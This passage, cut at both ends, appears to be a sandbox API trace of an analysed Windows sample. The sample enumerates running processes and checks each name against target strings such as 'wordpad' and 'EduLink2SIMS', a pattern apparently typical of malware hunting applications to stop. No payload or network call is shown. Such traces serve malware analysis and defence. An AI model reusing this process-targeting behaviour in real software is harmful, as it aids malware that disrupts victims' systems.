th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0100.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.760] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356e658 [0100.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x356e658, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0100.760] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0100.760] StrStrIA (lpFirst="mail.exe", lpSrch="wordpad") returned 0x0 [0100.760] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.761] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e3d0 [0100.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356e3d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0100.761] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0100.761] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="wordpad") returned 0x0 [0100.761] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.762] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e460 [0100.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e460, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.762] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.763] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0100.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.770] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e478 [0100.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x356e478, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.770] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0100.770] StrStrIA (lpFirst="dllhost.exe", lpSrch="wordpad") returned 0x0 [0100.770] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.771] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e490 [0100.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356e490, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.771] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.771] StrStrIA (lpFirst="taskhostw.exe", lpSrch="wordpad") returned 0x0 [0100.771] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0100.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.772] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e4a8 [0100.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x356e4a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0100.772] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0100.772] StrStrIA (lpFirst="UsoClient.exe", lpSrch="wordpad") returned 0x0 [0100.772] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.774] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e670 [0100.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356e670, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.774] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.774] StrStrIA (lpFirst="taskhostw.exe", lpSrch="wordpad") returned 0x0 [0100.774] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0100.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.775] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357d708 [0100.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357d708, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0100.775] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0100.775] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="wordpad") returned 0x0 [0100.775] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0100.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.776] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d728 [0100.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357d728, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0100.776] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0100.776] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="wordpad") returned 0x0 [0100.777] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0100.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.778] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356c248 [0100.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356c248, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0100.778] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0100.778] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="wordpad") returned 0x0 [0100.778] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.779] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e430 [0100.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356e430, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.779] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0100.779] StrStrIA (lpFirst="conhost.exe", lpSrch="wordpad") returned 0x0 [0100.779] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.781] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e550 [0100.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356e550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.781] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0100.781] StrStrIA (lpFirst="conhost.exe", lpSrch="wordpad") returned 0x0 [0100.781] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0100.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.782] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e4c0 [0100.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x356e4c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0100.782] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0100.782] StrStrIA (lpFirst="rxodge.exe", lpSrch="wordpad") returned 0x0 [0100.782] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.783] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e688 [0100.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x356e688, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0100.783] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0100.784] StrStrIA (lpFirst="sppsvc.exe", lpSrch="wordpad") returned 0x0 [0100.784] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0100.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.785] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d848 [0100.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357d848, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0100.785] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0100.785] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="wordpad") returned 0x0 [0100.785] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0100.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.786] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e598 [0100.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x356e598, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0100.786] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0100.786] StrStrIA (lpFirst="TiWorker.exe", lpSrch="wordpad") returned 0x0 [0100.787] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0100.787] CloseHandle (hObject=0x350) returned 1 [0100.787] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0100.817] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.818] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d548 [0100.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357d548, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0100.818] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0100.818] StrStrIA (lpFirst="[System Process]", lpSrch="EduLink2SIMS") returned 0x0 [0100.818] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0100.819] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e158 [0100.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e158, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0100.819] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0100.819] StrStrIA (lpFirst="System", lpSrch="EduLink2SIMS") returned 0x0 [0100.819] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.820] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356e3a0 [0100.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x356e3a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0100.820] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0100.820] StrStrIA (lpFirst="smss.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.821] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.822] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e5b0 [0100.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356e5b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0100.822] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0100.822] StrStrIA (lpFirst="csrss.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.822] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.827] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e4f0 [0100.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x356e4f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0100.827] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0100.827] StrStrIA (lpFirst="wininit.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.827] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.828] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e5c8 [0100.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356e5c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0100.828] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0100.828] StrStrIA (lpFirst="csrss.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.828] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.829] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e508 [0100.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, 